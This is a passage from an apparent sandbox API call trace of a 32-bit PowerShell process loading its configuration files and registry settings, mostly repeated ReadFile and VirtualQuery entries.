lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.783] GetLastError () returned 0x0 [0049.783] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.783] GetLastError () returned 0x0 [0049.783] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.783] GetLastError () returned 0x0 [0049.784] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.784] GetLastError () returned 0x0 [0049.784] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.784] GetLastError () returned 0x0 [0049.784] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.784] GetLastError () returned 0x0 [0049.784] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.784] GetLastError () returned 0x0 [0049.784] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.784] GetLastError () returned 0x0 [0049.785] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.785] GetLastError () returned 0x0 [0049.785] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.785] GetLastError () returned 0x0 [0049.785] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.785] GetLastError () returned 0x0 [0049.785] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.785] GetLastError () returned 0x0 [0049.785] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.785] GetLastError () returned 0x0 [0049.786] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.786] GetLastError () returned 0x0 [0049.786] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.786] GetLastError () returned 0x0 [0049.790] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.790] GetLastError () returned 0x0 [0049.790] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.790] GetLastError () returned 0x0 [0049.790] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.790] GetLastError () returned 0x0 [0049.790] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.791] GetLastError () returned 0x0 [0049.791] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.791] GetLastError () returned 0x0 [0049.791] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.791] GetLastError () returned 0x0 [0049.791] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.791] GetLastError () returned 0x0 [0049.791] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1000, lpOverlapped=0x0) returned 1 [0049.791] GetLastError () returned 0x0 [0049.792] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x1b4, lpOverlapped=0x0) returned 1 [0049.792] GetLastError () returned 0x0 [0049.792] ReadFile (in: hFile=0x35c, lpBuffer=0x2bdda88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e604, lpOverlapped=0x0 | out: lpBuffer=0x2bdda88*, lpNumberOfBytesRead=0x19e604*=0x0, lpOverlapped=0x0) returned 1 [0049.792] GetLastError () returned 0x0 [0049.792] CloseHandle (hObject=0x35c) returned 1 [0049.792] GetLastError () returned 0x0 [0049.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.792] GetLastError () returned 0x0 [0049.792] SetErrorMode (uMode=0x1) returned 0x1 [0049.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2bfe318 | out: lpFileInformation=0x2bfe318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0049.792] GetLastError () returned 0x0 [0049.792] SetErrorMode (uMode=0x1) returned 0x1 [0049.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.792] GetLastError () returned 0x0 [0049.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e588 | out: phkResult=0x19e588*=0x35c) returned 0x0 [0049.793] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e5d0, lpData=0x0, lpcbData=0x19e5cc*=0x0 | out: lpType=0x19e5d0*=0x1, lpData=0x0, lpcbData=0x19e5cc*=0x56) returned 0x0 [0049.793] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e5d0, lpData=0x247300, lpcbData=0x19e5cc*=0x56 | out: lpType=0x19e5d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e5cc*=0x56) returned 0x0 [0049.793] RegCloseKey (hKey=0x35c) returned 0x0 [0049.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.793] GetLastError () returned 0x0 [0049.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x19e0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0049.793] GetLastError () returned 0x0 [0049.964] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.978] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.980] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.981] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.981] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.981] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.982] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.985] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.996] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.997] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.997] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.997] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.997] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.997] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.998] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.998] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.003] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.009] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.009] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.011] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.011] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.012] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.012] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.013] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.013] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.014] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.014] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.014] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.014] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.015] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.017] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.020] VirtualQuery (in: lpAddress=0x19d4c8, lpBuffer=0x19e4c8, dwLength=0x1c | out: lpBuffer=0x19e4c8*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.020] VirtualQuery (in: lpAddress=0x19d4c8, lpBuffer=0x19e4c8, dwLength=0x1c | out: lpBuffer=0x19e4c8*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.020] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.022] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.076] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.077] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.077] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.084] GetLastError () returned 0xcb [0050.088] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.097] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.097] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.097] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.098] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.099] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.099] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.102] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.104] VirtualQuery (in: lpAddress=0x19d4c4, lpBuffer=0x19e4c4, dwLength=0x1c | out: lpBuffer=0x19e4c4*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e64c | out: phkResult=0x19e64c*=0x358) returned 0x0 [0050.109] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e6b4, lpData=0x0, lpcbData=0x19e6b0*=0x0 | out: lpType=0x19e6b4*=0x1, lpData=0x0, lpcbData=0x19e6b0*=0x74) returned 0x0 [0050.109] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e694, lpData=0x0, lpcbData=0x19e690*=0x0 | out: lpType=0x19e694*=0x1, lpData=0x0, lpcbData=0x19e690*=0x74) returned 0x0 [0050.109] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0x19e694, lpData=0x247300, lpcbData=0x19e690*=0x74 | out: lpType=0x19e694*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x19e690*=0x74) returned 0x0 [0050.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x19e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0050.109] GetLastError () returned 0xcb [0050.109] SetErrorMode (uMode=0x1) returned 0x1 [0050.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x19e694 | out: lpFileInformation=0x19e694*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0050.110] GetLastError () returned 0xcb [0050.110] SetErrorMode (uMode=0x1) returned 0x1 [0050.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.111] GetLastError () returned 0xcb [0050.111] SetErrorMode (uMode=0x1) returned 0x1 [0050.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0050.112] GetLastError () returned 0xcb [0050.112] SetErrorMode (uMode=0x1) returned 0x1 [0050.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: 